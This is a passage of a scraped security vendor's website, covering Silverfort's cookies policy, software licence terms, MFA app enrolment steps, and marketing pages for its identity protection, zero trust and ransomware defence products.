a demo. If you have MFA but your legacy apps, command line interfaces or fileshares are not protected, it’s like locking the front door while the back door is wide open. But no worries, we can help. Here’s what happens when you speak with us: We’ll listen. We want to understand your identity protection needs. We’ll demonstrate how our platform addresses your specific concerns. You’ll have all your questions answered. --- - Published: 2022-08-31 - Modified: 2024-06-05 - URL: https://www.silverfort.com/thank-you-for-downloading-service-accounts-ebook/ @extends('layouts.app-no-content') @section('content') @while (have_posts()) @php the_post() @endphp @endwhile @endsection --- - Published: 2022-08-22 - Modified: 2024-06-05 - URL: https://www.silverfort.com/thank-you-for-downloading-re-evaluate-your-mfa-protection-ebook/ @extends('layouts.app-no-content') @section('content') @while (have_posts()) @php the_post() @endphp @endwhile @endsection --- - Published: 2022-08-22 - Modified: 2024-06-05 - URL: https://www.silverfort.com/thank-you-for-downloading-rethinking-ransomware-protection-ebook/ @extends('layouts.app-no-content') @section('content') @while (have_posts()) @php the_post() @endphp @endwhile @endsection --- - Published: 2022-08-22 - Modified: 2024-06-05 - URL: https://www.silverfort.com/thank-you-for-downloading-silverfort-adaptive-authentication-white-paper/ @extends('layouts.app-no-content') @section('content') @while (have_posts()) @php the_post() @endphp @endwhile @endsection --- - Published: 2022-08-22 - Modified: 2024-06-05 - URL: https://www.silverfort.com/thank-you-for-downloading-protecting-the-unprotectable-white-paper/ @extends('layouts.app-no-content') @section('content') @while (have_posts()) @php the_post() @endphp @endwhile @endsection --- - Published: 2022-08-02 - Modified: 2024-11-04 - URL: https://www.silverfort.com/request-a-demo-lp/ Fill out the form to schedule a demo. Here’s what happens when you speak with us: We’ll listen. We want to understand your identity protection needs. We’ll demonstrate how our platform addresses your specific concerns. You’ll have all your questions answered. --- - Published: 2022-07-26 - Modified: 2025-08-21 - URL: https://www.silverfort.com/company/cookies-policy/ We use cookies and similar files or technologies to automatically collect and store information about your computer, device, and Site usage, in order to improve their performance and enhance your user experience. We use the general term “cookies” in this policy to refer to these technologies and all such similar technologies that collect information automatically when you are using our Site where this policy is posted. You can find out more about cookies and how to control them in the information below. If you do not accept the use of these cookies, please disable them using the instructions in this cookie policy or by changing your browser settings so that cookies from this Site cannot be placed on your computer or mobile device. Important: disabling cookies on this site may seriously cripple the user experience and other features on the Site and Services, to the point of rendering them useless. In this Cookies Policy, we use the term Silverfort (and “we”, “us” and “our”) to refer to Silverfort, Inc. This Cookies Policy, along with our Privacy Policy available at https://www. silverfort. com/company/privacy-policy forms part of our Terms and Conditions, available at https://www. silverfort. com/company/terms-of-use/.  Capitalized terms not otherwise defined in this Cookies Policy have the same meaning given in our Terms and Conditions. What is a cookie? Cookies are computer files containing small amounts of information which are downloaded to your computer or mobile device when you visit a website. Cookies can then be sent back to the originating website on each subsequent visit, or to another website that recognizes that cookie. Cookies are widely used in order to make websites work, or to work more efficiently, as well as to provide information to the owners of the site. Cookies do lots of different jobs, like letting you navigate between pages efficiently, remembering your preferences, and generally improving the user experience. Cookies may tell us, for example, whether you have visited our Site before or whether you are a new visitor. There are two broad categories of cookies: First party cookies, served directly by us to your computer or mobile device. Third party cookies, which are served by a third party on our behalf. We use third party cookies for functionality, performance / analytics, and social media purposes. Cookies can remain on your computer or mobile device for different periods of time. Some cookies are ‘session cookies’, meaning that they exist only while your browser is open. These are deleted automatically once you close your browser. Other cookies are ‘permanent cookies’, meaning that they survive after your browser is closed. They can be used by websites to recognize your computer when you open your browser and browse the Internet again. We may also use web beacon or other similar cookie technologies. When a visitor accesses our Site, a non-identifiable notice of that visit is generated which may be processed by us or by third parties. These web beacons usually work in conjunction with cookies. If you don’t want your cookie information to be associated with your visits to these pages, you can set your browser to turn off cookies as described further below. If you turn off cookies, web beacon and other technologies will still detect your visits to our Site; however, they will not be associated with information otherwise stored in cookies. How do we use cookies? We use cookies to: track traffic flow and patterns of travel in connection with our Site;understand the total number of visitors to our sites on an ongoing basis and the types of internet browsers (e. g. Chrome, Firefox, Safari, or Internet Explorer) and operating systems (e. g. Windows or Mac) used by our visitors;monitor the performance of our Site and to continually improve it; andcustomize and enhance your online experience. We may also use a third party called Google Analytics to gather general information about how people use our website for the purposes of website optimization and analytics. To find out more about Google Analytics’ privacy policies, please visit http://www. google. com/policies/privacy/partners/. We, or our third-party mail service providers, may also include web beacons in e-mail messages to you in order to determine whether messages have been opened and links contained within them have been clicked. What types of cookies do we use? The types of cookies used by us and our partners in connection with the Site can be classified into one of three categories, namely ‘essential website cookies’, ‘functionality cookies’, and ‘analytics and performance cookies’. We’ve set out some further information about each category, and the purposes of the cookies we and third parties set in the following table. Cookies necessary for essential website purposes These cookies are essential to provide you with services available through this Site and to use some of its features, such as access to secure areas. Without these cookies, services you have asked for, like transactional pages and secure login accounts, would not be possible. Functionality Cookies Functionality cookies record information about choices you’ve made and allow us to tailor the website to you. These cookies mean that when you continue to use or come back to the Site, we can provide you with our services as you have asked for them to be provided. For example, these cookies allow us to: Save your location preference if you have set your location on the homepage in order to receive a localized information;Remember settings you have applied, such as layout, text size, preferences, and colors;Show you when you are logged in; andStore accessibility options. Performance / Analytics Cookies We use performance/analytics cookies to analyze how the website is accessed, used, or is performing in order to provide you with a better user experience and to maintain, operate and continually improve the website. For example, these cookies allow us to: Better understand our website visitors so that we can improve how we present our content;Test different design ideas for particular pages, such as our homepage;Collect information about site visitors such as where they are located and what browsers they are using;Determine the number of unique users of the website;Improve the website by measuring any errors that occur; andConduct research and diagnostics to improve product offerings. How to control or delete cookies You have the right to choose whether or not to accept cookies and we have explained how you can exercise this right below. However, please note that if you choose to refuse cookies you may not be able to use the full functionality of our Site. Most browsers allow you to change your cookie settings. These settings will typically be found in the “options” or “preferences” menu of your browser. In order to understand these settings and learn how to use them, please consult the “Help” function of your browser, or the documentation published online for your particular browser type and version. Need More Information? If you would like to find out more about cookies and their use on the Internet, you may find the following link useful: All About Cookies Cookies that have been set in the past If you have disabled one or more Cookies, we may still use information collected from cookies prior to your disabled preference being set, however, we will stop using the disabled cookie to collect any further information. Contact us If you have any questions or comments about this cookies policy, or privacy matters generally, please contact us via email at info@silverfort. com. --- - Published: 2022-06-28 - Modified: 2025-08-21 - URL: https://www.silverfort.com/company/silverfort-software-license-agreement-01-21/ BY INSTALLING, ACCESSING AND/OR USING THE SILVERFORT AUTHENTICATION PLATFORM SOFTWARE (“SOFTWARE”), YOU EXPRESSLY ACKNOWLEDGE AND AGREE THAT YOU, OR THE COMPANY YOU REPRESENT, (“YOU” OR “LICENSEE“) ARE ENTERING INTO A LEGAL AGREEMENT WITH SILVERFORT INC. OR SILVERFORT LTD. ( “SILVERFORT”), AND HAVE UNDERSTOOD AND AGREE TO COMPLY WITH, AND BE LEGALLY BOUND BY, THE TERMS AND CONDITIONS OF THIS AGREEMENT (“AGREEMENT“). SILVERFORT AND LICENSEE MAY EACH BE INDIVIDUALLY REFERRED TO HEREIN AS A “PARTY” AND COLLECTIVELY AS THE “PARTIES. ”. IF YOU HAVE ALREADY ENTERED INTO A SEPARATE LICENSE AGREEMENT DIRECTLY WITH SILVERFORT IN CONNECTION WITH THE ACCESS OR USE OF THE SOFTWARE THEN THIS AGREEMENT SHALL NOT APPLY,. IF YOU HAVE PURCHASED THE LICENSE GRANTED HEREUNDER FROM A PARTNER, RESELLER OR DISTRIBUTOR AUTHORIZED BY SILVERFORT (“PARTNER”), TO THE EXTENT THERE IS ANY CONFLICT BETWEEN THIS AGREEMENT AND THE AGREEMENT ENTERED BETWEEN YOU AND THE RESPECTIVE PARTNER, INCLUDING ANY PURCHASE ORDER (“PARTNER ORDER FORM”), THEN, AS BETWEEN YOU AND SILVERFORT, THIS AGREEMENT SHALL PREVAIL. ANY RIGHTS GRANTED TO YOU IN SUCH PARTNER ORDER FORM WHICH ARE NOT CONTAINED IN THIS AGREEMENT, APPLY ONLY IN CONNECTION WITH SUCH PARTNER. IN THAT CASE, YOU MUST SEEK REDRESS OR REALIZATION OR ENFORCEMENT OF SUCH RIGHTS SOLELY WITH SUCH PARTNER AND NOT SILVERFORT. 1. Definitions. 1. 1. “Affiliate” means any entity which directly or indirectly controls, is controlled by, or is under common control with a Party, where “control” means owning 50% or more of the voting securities of such entity or the ability to direct managerial decisions or board decisions of such entity. 1. 2. “Anonymous Information” means any information about the use or operation of the Software (including, but not limited to, aggregated analytics information, such as the overall number of users of the Software) collected or otherwise obtained by Silverfort which does not enable identification of the Licensee or any of its users and does not contain any identifiable information (such as user names, service names or network addresses) from Licensee’s network. For the avoidance of doubt, Anonymous Information does not include Licensee Data. 1. 3. “Documentation” means any material that Silverfort provides or makes available (including online) to Licensee which contains instructions on how to utilize the Software. 1. 4. “End User Order Form” means, as applicable, any written or electronic order form (i) issued by Silverfort and agreed to by Licensee or (ii) issued by Licensee pursuant to a Proposal made by Silverfort to Licensee, each for the provision by Silverfort of a license to use the Software and/or the Support Services to Licensee. 1. 5. “Licensee Data” means any data or data logs containing identifiable information regarding activity of Licensee’s individual users (such as user names, service names or network addresses) of the Software. For the avoidance of doubt, Licensee Data does not include Anonymous Information. 1. 6. “Order Form” means either a Partner Order Form or an End User Order Form, as applicable. 1. 7. “Protected and Monitored User Accounts” means the user accounts, as well as service accounts, which are audited, analyzed and/or secured by the Software. 1. 8. “Proposal” means any written or electronic price proposal, made by Silverfort to Licensee, setting forth the scope and price of the license to use the Software and/or the provision of the Support Services, as applicable. 1. 9. “Support Services” means any support services provided by Silverfort to Licensee relating to the Software as set forth in the applicable Order Form. 1. 10. “Software Updates” means any updates, upgrades, modifications, improvements, enhancements, new versions, new releases and corrections to the Software and any derivative works based on the Software, including, in each case, any error corrections, patches and bug fixes. 2. License. 2. 1. Software License. Subject to the terms and conditions of this Agreement, Silverfort hereby grants Licensee a non-exclusive, non-sublicensable, non-transferable, revocable license, for the duration of the Term (as defined below), to use the Software solely in object code format and solely for internal business security purposes (the “License”). The License shall be limited to the maximum number of Protected and Monitored User Accounts specified in the Order Form , which may be assigned to members of either Licensee or Licensee’s majority owned Affiliates. 2. 2. Documentation. During the Term, Licensee (and , if relevant, its Affiliates) may use the Documentation solely for Licensee’s internal business security purposes and solely in connection with Licensee’s use of the Software. 2. 3. Reservation of Rights. Other than the limited rights explicitly granted under this Agreement, Licensee shall have no other rights, express or implied, in the Software and all such rights are reserved by Silverfort. 2. 4 Use Restrictions. Licensee shall not, directly or indirectly: (i) sell, lease, sublicense or distribute the Software, or any part thereof, or otherwise transfer the Software, or any part thereof, or allow any third party to use the Software, or any part thereof, in any manner; (ii) install the Software, or any part thereof, on a server not owned by, and in the control and possession of Licensee or its Affiliates; (iii) reverse engineer, decompile, disassemble or otherwise reduce to human-perceivable form the Software’s source code, or any part thereof; (iv) copy, modify, revise, enhance or alter the Software, or any part thereof; (v) make the Software, or any part thereof, accessible to other users or the public; (vi) circumvent, disable or otherwise interfere with security-related features of the Software, or any part thereof, or features that prevent or restrict use or copying of any content or that enforce limitations on use of the Software, or any part thereof; (vii) interfere or attempt to interfere with the integrity or proper working of the Software, or any part thereof; (viii) remove, alter or obscure any proprietary notice displayed on or via the Software, or any part thereof; (ix) use the Software, or any part thereof, to violate any applicable laws; (x) represent that it possesses any proprietary interest in the Software, or any part thereof; (xi) publish or disclose to any third party any reviews, testing information or the results of any benchmark test of the Software, or any part thereof, without Silverfort’s express prior written consent; (xii) attempt to circumvent or otherwise bypass the maximum number of Protected and Monitored User Accounts set forth in the Order Form; and/or (xiii) solicit, encourage, permit, allow or assist any person to do any of the foregoing. 2. 5. Open Source Licenses.  The Software includes certain open source code software and materials that are subject to their respective open source licenses. A list of any third-party open source software and related open source licenses is available Silverfort’s online customer portal. 2. 6. Software Updates. Unless otherwise specified in an Order Form, during the Term, from time to time, Silverfort may, in its sole discretion, deliver Software Updates to Licensee. From time to time, Silverfort shall update the Documentation to reflect any Software Updates and shall make such updated Documentation available to Licensee. 2. 7. Support Services. Subject to the terms and conditions of this Agreement, Silverfort shall provide the Support Services if and as provided in any Order Form for the duration of the Term. 3. Licensee Data and Analytics Information. 3. 1. As Silverfort operates the Software, it may monitor Licensee Data in order to detect and prevent cyber threats. Licensee is the exclusive owner of all Licensee Data. To the extent that Licensee Data is made available to Silverfort, during the Term, Licensee hereby grants Silverfort a non-exclusive, irrevocable, non-sublicensable, royalty-free, fully paid-up right and license to use such Licensee Data to perform Silverfort’s obligations under this Agreement and any Order Form. 3. 2. Licensee represents and warrants to Silverfort that, to the extent Licensee Data includes any personally identifiable information or personal data (each as defined in applicable data privacy laws) (“Personal Data”), Licensee has the appropriate legal bases, required consents or permits and has acted in compliance with all applicable privacy laws and regulations (including, but not limited to, the Regulation (EU) 2016/679 (General Data Protection Regulation) (“GDPR”)), as to allow Silverfort to receive (including transfers outside of the European Economic Area), process and use such Licensee Data solely in order to perform Silverfort’s obligations under this Agreement and any Order Form. To the extent that Licensee needs a data processing agreement, Licensee shall request Silverfort’s Data Processing Agreement (“DPA”) and return it duly signed to Silverfort. 3. 3. In the event Licensee (i) fails to comply with any applicable data privacy law or regulation (including the GDPR), (ii) fails to comply with any provision of the DPA and/or (iii) fails to sign the DPA and return an executed version of the DPA to Silverfort, then: (a) to the maximum extent permitted by law, Licensee shall be solely and fully responsible and liable for any such breach, violation, infringement and/or processing of Personal Data by Silverfort or any of Silverfort’s affiliates or subsidiaries (including, without limitation, Silverfort’s employees, officers, directors, subcontractors and agents), and the consequences of any of the foregoing; (b) in the event of any claim of any kind related to any such breach, violation or infringement and/or any claim related to processing of Personal Data, Licensee shall defend, hold harmless and indemnify Silverfort and Silverfort’s affiliates and subsidiaries (including, without limitation, their employees, officers, directors, subcontractors and agents) from and against any and all losses, penalties, fines, damages, liabilities, settlements, costs and expenses, including reasonable attorneys’ fees; and (c) the limitation of Licensee’s liability under Section ‎10 below shall not apply with respect to paragraphs (a) and (b) above. 4. Usage Reporting and Audit. Subject to the terms of the Order Form, if applicable and requested by Silverfort, Licensee shall report to Silverfort, the maximum number of Protected and Monitored User Accounts which utilize the Software in order to verify that Licensee’s usage of the Software is in accordance with the terms of the Order Form. Silverfort may, from time to time, audit Licensee’s compliance with this Agreement (including the limitations on the number of Protected and Monitored User Accounts under Section 2. 1), and Licensee will modify its actions in order to fully comply with this Agreement as may be reasonably required by Silverfort. 5. Payments. The licenses granted hereunder and the provision of Support Services, to the extent applicable, are subject to the full payment of the applicable fees as set forth in the Order Form. 6. Title & Ownership. 6. 1. Software. The Software is not for sale and is and shall remain Silverfort’s exclusive property. All right, title, and interest in and to the Software, including any intellectual property rights therein, and any and all improvements and derivative works thereof are and shall remain, as between the Parties, owned exclusively by Silverfort. To the extent that Licensee acquires any right, title or interest in or to any Software, Licensee hereby irrevocably and perpetually assigns to Silverfort all such right, title and interest. Nothing herein constitutes a waiver of Silverfort’s intellectual property rights under any applicable laws. 6. 2. Feedback. If Silverfort receives any feedback (including, but not limited to, questions, comments and suggestions) regarding any of its Support Services and/or products (including the Software) (collectively, “Feedback”), all Feedback, including all intellectual property rights therein, shall be owned exclusively by Silverfort and shall be considered Silverfort’s Confidential Information. Licensee hereby irrevocably and perpetually assigns to Silverfort all Feedback and all intellectual property rights therein and Licensee hereby waives any and all moral rights that Licensee may have in such Feedback. 6. 3. Any Anonymous Information, which is derived from the use of the Services is owned by Silverfort and may be used, among others, for providing the Service, for development, and/or for statistical purposes. 7. Confidentiality. 7. 1. A Party (the “Disclosing Party”) may from time to time during the Term disclose to the other Party (the “Receiving Party”) certain confidential, proprietary or other non-public information, including technical, marketing, financial, employee and planning (“Confidential Information”). Regardless of whether Confidential Information is identified by the Disclosing Party as confidential, any information... --- - Published: 2022-06-28 - Modified: 2025-02-27 - URL: https://www.silverfort.com/enrolling-users/ Installing Silverfort Mobile App On your mobile device, open the App Store or Google Play Store. Search for Silverfort. Install the Silverfort app. Configuring Silverfort Mobile App Once you have installed the mobile app, you need to configure it for MFA for your organization. On your mobile device, open the Silverfort app. If this is the first time you are using the app, you are prompted to enter your email address. You must enter your corporate email address. Note: If you have already configured Silverfort with an email address and want to configure an additional email address, on the app’s home screen, tap Add User. Enter your email address, then tap Send Verification Code. Silverfort checks the email address with your organization’s Silverfort MFA servers and, if you have been configured for MFA, you will receive an email containing a verification code. Open your email and locate your verification code. 4. Type the verification code into Silverfort, then tap Verify Account 5. Upon successful verification, the app confirms you have been successfully verified. Using Silverfort Mobile App Whenever you access a corporate resource that is protected with Silverfort’s MFA, after entering your login credentials, you will need to confirm your intent to log into the resource. Log in to the corporate resource as usual. After entering your credentials, you will be prompted to confirm your identity. Open the Silverfort Mobile App. To confirm your identity and log in to the corporate resource, tap YES. Once your identity has been verified, you are logged into the corporate resource. In any case, you’re prompted and it’s not you attempting to access a corporate resource tap NO --- - Published: 2022-06-28 - Modified: 2024-06-05 - URL: https://www.silverfort.com/logo-png/ Logo.png(170×38) | Silverfort Skip to content Why Silverfort Close Why Silverfort Open Why Silverfort Overview Maximum security, minimal effort. Identity security done right. Read more For Identity Teams For Security Teams Runtime Access Protection Customer Stories Platform Close Platform Open Platform The Identity Security Platform What if you could protect all the silos of your identity infrastructure? 
We found a way. About the platform Capabilities Privileged Access Security Go beyond managing your privileged accounts. NHI Security Every non-human identity—in view and in control. Universal MFA Push MFA beyond limits. Protect everything. Authentication Firewall Boost your resilience with the power of deny. ITDR Detect and respond. Anytime, anywhere. ISPM Find, fix and fortify every identity weakness, everywhere. AI Agent Security Govern, monitor and protect your AI agents. Pricing Solutions Close Solutions Open Solutions By Use Case Identity-First Incident Response The missing piece in your incident response toolkit. Service Account Protection All service accounts discovered, monitored, protected. Ransomware & Lateral Movement Stop ransomware and lateral movement in real time. Active Directory Protection See, know and secure every user access. Cyber Insurance Simplify and expedite cyber insurance compliance. Regulatory Compliance Complete protection for built-in compliance. Identity Zero Trust Bring zero trust to the identity control plane. Secure Privileged Access Protect all privileged users—human and machine. OT Network Protection Enhance your OT network resilience. By Industry Manufacturing Education Healthcare Finance Retail Telecoms Partners Close Partners Open Partners Partner Portal Become a Partner Our Partner Network Channel Partners Help your customers secure every dimension of identity. Identity Security Alliance Bringing together next-gen technology partners. Cyber Insurance Partners Empower your insureds to comply and protect. Resources Close Resources Open Resources Learn Resource Library From eBooks to webinars, browse our full library. Blog Discover the latest and greatest in identity security. Glossary Look up any identity security term in our extensive glossary. Customer Success & Support Silverfort Community Get to know other Silverfort customers in our community. Silverfort Academy Make the most out of Silverfort with our knowledge base. Contact support Need help? No worries—contact our support team 24/7. Documentation Access release & product notes, technical specs and more. Test Flight World Tour 2025 Buckle up for the Silverfort Test Flight World Tour, a hands-on identity security experience like no other! Read more Company Close Company Open Company About us Careers Newsroom Trust Center Events Contact us Get a demo Platform Why Silverfort Platform Overview Pricing Customer Stories Products Universal MFA Non-Human Identity Security Authentication Firewall Privileged Access Security ITDR ISPM AI Agent Security Solutions Cyber Insurance Ransomware Prevention Identity-First Incident Response Resources Resource Library Blog Glossary Company About us Careers Events Partner Network Channel Partners Partner Portal Identity Security Alliance Cyber Insurance Partners Support Contact Support Academy   © 2025 Silverfort. All Rights Reserved. Terms of Use Privacy Policy Sitemap Data Privacy Framework Linkedin X-twitter Youtube --- - Published: 2022-06-14 - Modified: 2025-07-21 - URL: https://www.silverfort.com/use-cases/cyber-insurance-compliance/ Cyber insurance compliance Coverage is complete. Compliance is built in. Meet and exceed the extended MFA requirements of cyber insurance policies with end-to-end identity security. Rapid implementation. Rapid compliance. Rapid return on investment. Get a demo or Take a tour Cut through compliance complexity with unified identity security. Silverfort simplifies and expedites compliance by unifying the silos of identity infrastructure. Our platform seamlessly extends security controls across every identity, resource and environment, so you can check every box. Secure every admin account Extend MFA across all on-prem and cloud resources—from legacy apps to command line tools—with our Runtime Access Protection. Accelerated integration and ROI Achieve universal identity security at speed. Fully deploy in your production environment within the timeframe set by your broker. Total compliance assured Renew your cyber liability policy with confidence. With universal coverage, you can check off all MFA requirements and more. Learn more about our platform The Silverfort Identity Security Platform How we help you achieve full cyber insurance compliance Meet every cyber insurance requirement at speed. Extend MFA everywhere Including all admin access, remote network access, and command-line tools. Protect all service accounts Identify and protect every NHI and service account in your environment. Stop ransomware Halt lateral movement, privilege escalation and ransomware in its tracks. Including all admin access, remote network access, and command-line tools. Identify and protect every NHI and service account in your environment. Halt lateral movement, privilege escalation and ransomware in its tracks. Take a platform tour Latest blog View more --- - Published: 2022-05-09 - Modified: 2025-07-21 - URL: https://www.silverfort.com/use-cases/zero-trust-security/ Identity Zero Trust Trust made easy. Bring zero trust security to the identity control plane with adaptive least-privilege access policies across every on-prem and cloud resource—all without making any changes to your applications or infrastructure. Get a demo or Take a tour Zero trust that's fast and efficient. Identity is the ultimate place to start your Zero Trust journey, with continuous analysis and enforcement of security control on every user access. Rapid time to value  Protect and observe all user access within days of initial deployment, with no costly and complex changes to your network or identity infrastructure. High precision analysis Eliminate the possibility of malicious access with compromised credentials by preventing users to access resources without rigorous risk analysis and verification. Real-time enforcement Trigger MFA, JIT, and Deny Access to block malicious access to your resources and halt the spread of live attacks. Learn more about our platform The Silverfort Identity Security Platform How it works All resources: from legacy on-prem to the cloud. Proactively reduce the attack surface Apply identity-based segmentation across your hybrid environment so users can only access the resources they need, reducing blast radius in a compromise scenario. Extend protection to all resources View and monitor every user access attempt across your entire identity infrastructure, from on-prem AD to SaaS applications and cloud workloads. Eliminate threat exposures Identify and resolve any weaknesses and excessive trust within your hybrid environment that expose your users to compromise and your resources to malicious access. Apply identity-based segmentation across your hybrid environment so users can only access the resources they need, reducing blast radius in a compromise scenario. View and monitor every user access attempt across your entire identity infrastructure, from on-prem AD to SaaS applications and cloud workloads. Identify and resolve any weaknesses and excessive trust within your hybrid environment that expose your users to compromise and your resources to malicious access. Take a platform tour Learn more View more --- - Published: 2022-04-18 - Modified: 2025-07-21 - URL: https://www.silverfort.com/platform/universal-multi-factor-authentication/ Universal Multi-Factor Authentication Push MFA beyond limits. Protect everything. When we say universal, we mean it. Extend MFA protection to Active Directory managed resources without modifying them, including legacy applications, command line interfaces and OT systems. Get a demo or Take a tour Universal MFA that adapts to your environment. Silverfort’s end-to-end Identity Security Platform seamlessly fuses with your entire identity infrastructure, so you can protect your on-prem resources with cloud-level MFA. 360 Active Directory protection Silverfort is the only solution that natively integrates with Active Directory to enforce MFA on every Kerberos, NTLM, and LDAP authentication. Minimize your attack surface and block attacks Configure policies to mitigate risks disclosed by Silverfort’s ISPM, or block active attacks that were detected by Silverfort’s ITDR. Extend your MFA of choice Integrate the MFA solution you’re already using with Silverfort to extend its protection to all AD resources—without affecting your employees’ user experience. Learn more about our platform One end-to-end platform. All MFA needs covered. Protect all resources and access interfaces Extend your existing MFA solution to cover all your resources and access interfaces that weren’t natively supported. Homegrown applications Legacy systems Admin access tools File systems and databases VPN IT infrastructure Desktop login RDP & SSH SaaS applications VDI & Citrix Combine static and risk-based policies Bolster your identity security posture with by combining traditional rule-based policies with risk-based policies that trigger MFA in response to changes in users’ and resources’ risk levels. Replace, extend, or consolidate your existing MFA solution Your environment, your choice. Adopt Silverfort as your single MFA provider, or use it to compliment or extend the MFA solution you’re currently using to lower costs and provide a more consistent user experience. See Silverfort's universal MFA in action. Take a tour of Universal MFA Scaling MFA to all on-prem environments & systems "Many large enterprises find it difficult to quickly implement secure employee authentication across all their different environments. Silverfort’s innovative solution simplifies this process without the need for system modifications, so enterprises can save time and money. " William Woo CIO | Singtel Group The challenge Core parts of Singtel’s environments and systems are on-prem and required MFA protection. Singtel quickly realized that implementing MFA agents on every application server was impractical due to the large number of machines and code change requirements. They needed a more scalable solution. Our solution Since deploying Silverfort, Singtel has successfully scaled MFA protection capabilities to all of their on-prem environments and systems. Singtel’s infrastructure team was pleased that no code changes to applications or deployment of agents were needed. Learn more Explore blog --- - Published: 2022-04-18 - Modified: 2025-07-21 - URL: https://www.silverfort.com/use-cases/ransomware-protection/ Lateral movement & ransomware protection Stop attacks from spreading in real time. Defend against ransomware attacks and put a stop to lateral movement by detecting and blocking malicious authentications as they happen. Get a demo or Take a tour The identity way is the only way. Silverfort is the only solution that can enforce MFA at scale in any environment to disable lateral movement and ransomware spread. MFA without limits Block ransomware from spreading through your network using compromised credentials by placing MFA policies on PsExec, PowerShell, WMI and more. Prevention—not just detection MFA outsources the initial response to the entire workforce, engaging the security team only in true positive where compromised has been validated by the user. Privileged access protection All admins, including both human users and service accounts are protected with automated least-privileged access policy to minimize compromise impact and prevent malicious abuse of their access privileges. Learn more about our platform The Silverfort Identity Security Platform How it works Automate protection with real-time access controls. Detect with accuracy Our platform analyzes every authentication and access attempt to detect the use of malicious TTPs for privilege escalation or lateral movement. Protect with confidence Configure MFA policies to trigger protection for detected risks, disabling adversaries from using compromised credentials for malicious access. Secure service accounts Enforce automated access policies on your service accounts to ensure they cannot access any resources outside of their designated scope. Our platform analyzes every authentication and access attempt to detect the use of malicious TTPs for privilege escalation or lateral movement. Configure MFA policies to trigger protection for detected risks, disabling adversaries from using compromised credentials for malicious access. Enforce automated access policies on your service accounts to ensure they cannot access any resources outside of their designated scope. Take a platform tour Learn more Explore blog --- - Published: 2022-03-30 - Modified: 2025-08-21 - URL: https://www.silverfort.com/terms-of-use/ Welcome to www. silverfort. com (together with its subdomains, Content, Marks and services, the “Site”). Please read the following Terms of Use carefully before using this Site so that you are aware of your legal rights and obligations with respect to Silverfort Inc. and its subsidiaries (“Silverfort“, “we“, “our” or “us“). By accessing or using the Site, you expressly acknowledge and agree that you are entering a legal agreement with us and have understood and agree to comply with, and be legally bound by, these Terms of Use, together with the Privacy Policy (the “Terms“). You hereby waive any applicable rights to require an original (non-electronic) signature or delivery or retention of non-electronic records, to the extent not prohibited under applicable law. If you do not agree to be bound by these Terms please do not access or use the Site. Background. The Site is intended to provide information about Silverfort’s authentication products and services. Modification. We reserve the right, at our discretion, to change these Terms at any time. Such change will be effective ten (10) days following posting of the revised Terms on the Site, and your continued use of the Site thereafter means that you accept those changes. Ability to Accept Terms. The Site is only intended for individuals aged eighteen (18) years or older. If you are under 18 years please do not visit or use the Site. Site Access. For such time as these Terms are in effect, we hereby grant you permission to visit and use the Site provided that you comply with these Terms and applicable law. Restrictions. You shall not: (i) copy, distribute or modify any part of the Site without our prior written authorization; (ii) use, modify, create derivative works of, transfer (by sale, resale, license, sublicense, download or otherwise), reproduce, distribute, display or disclose Content (defined below), except as expressly authorized herein; (iii) disrupt servers or networks connected to the Site; (iv) use or launch any automated system (including without limitation, “robots” and “spiders”) to access the Site; and/or (v) circumvent, disable or otherwise interfere with security-related features of the Site or features that prevent or restrict use or copying of any Content or that enforce limitations on use of the Site. Intellectual Property Rights. 6. 1 Material and Marks. The (i) content on the Site, including without limitation, the text, documents, articles, brochures, descriptions, products, software, graphics, photos, sounds, videos, interactive features, and services (collectively, the “Materials“), and (ii) the trademarks, service marks and logos contained therein (“Marks“), are the property of Silverfort and/or its licensors and may be protected by applicable copyright or other intellectual property laws and treaties. “Silverfort”, the Silverfort logo, and other marks are Marks of Silverfort or its affiliates. All other trademarks, service marks, and logos used on the Site are the trademarks, service marks, or logos of their respective owners. We reserve all rights not expressly granted in and to the Site and the Content. 6. 2 Use of Content. Content on the Site is provided to you for your information and personal use only and may not be used, modified, copied, distributed, transmitted, broadcast, displayed, sold, licensed, de-compiled, or otherwise exploited for any other purposes whatsoever without our prior written consent. If you download or print a copy of the Content you must retain all copyright and other proprietary notices contained therein. If you download or print a copy of the Content you must retain all copyright and other proprietary notices contained therein. Information Description. We attempt to be as accurate as possible. However, we cannot and do not warrant that the Content available on the Site is accurate, complete, reliable, current, or error-free. We reserve the right to make changes in or to the Content, or any part thereof, in our sole judgment, without the requirement of giving any notice prior to or after making such changes to the Content. Your use of the Content, or any part thereof, is made solely at your own risk and responsibility. Links. 8. 1 The Site may contain links, and may enable you to post content, to third party websites that are not owned or controlled by Silverfort. We are not affiliated with, have no control over, and assume no responsibility for the content, privacy policies, or practices of, any third party websites. You: (i) are solely responsible and liable for your use of and linking to third party websites and any content that you may send or post to a third party website; and (ii) expressly release Silverfort from any and all liability arising from your use of any third party website. Accordingly, we encourage you to read the terms and conditions and privacy policy of each third party website that you may choose to visit. 8. 2 Silverfort permits you to link to the Site provided that: (i) you link to but do not replicate any page on this Site; (ii) the hyperlink text shall accurately describe the Content as it appears on the Site; (iii) you shall not misrepresent your relationship with Silverfort or present any false information about Silverfort and shall not imply in any way that we are endorsing any services or products, unless we have given you our express prior consent; (iv) you shall not link from a website (“Third Party Website”) which prohibites linking to third parties; (v) such Third party Website does not contain content that (a) is offensive or controversial (both at our discretion), or (b) infringes any intellectual property, privacy rights, or other rights of any person or entity; and/or (vi) you, and your website, comply with these Terms and applicable law. Privacy. We will use any personal information that we may collect or obtain in connection with the Site in accordance with our privacy policy which is available at info@silverfort. com Warranty Disclaimers. 10. 1 This section applies whether or not the services provided under the Site are for payment. Applicable law may not allow the exclusion of certain warranties, so to that extent certain exclusions set forth herein may not apply. 10. 2 THE SITE IS PROVIDED ON AN “AS IS” AND “AS AVAILABLE” BASIS, AND WITHOUT WARRANTIES OF ANY KIND EITHER EXPRESS OR IMPLIED. SILVERFORT HEREBY DISCLAIMS ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO IMPLIED WARRANTIES OF MERCHANTABILITY, TITLE, FITNESS FOR A PARTICULAR PURPOSE, NON-INFRINGEMENT, AND THOSE ARISING BY STATUTE OR FROM A COURSE OF DEALING OR USAGE OF TRADE. SILVERFORT DOES NOT GUARANTEE THAT THE SITE WILL BE FREE OF BUGS, SECURITY BREACHES, OR VIRUS ATTACKS. THE SITE MAY OCCASIONALLY BE UNAVAILABLE FOR ROUTINE MAINTENANCE, UPGRADING, OR OTHER REASONS. YOU AGREE THAT SILVERFORT WILL NOT BE HELD RESPONSIBLE FOR ANY CONSEQUENCES TO YOU OR 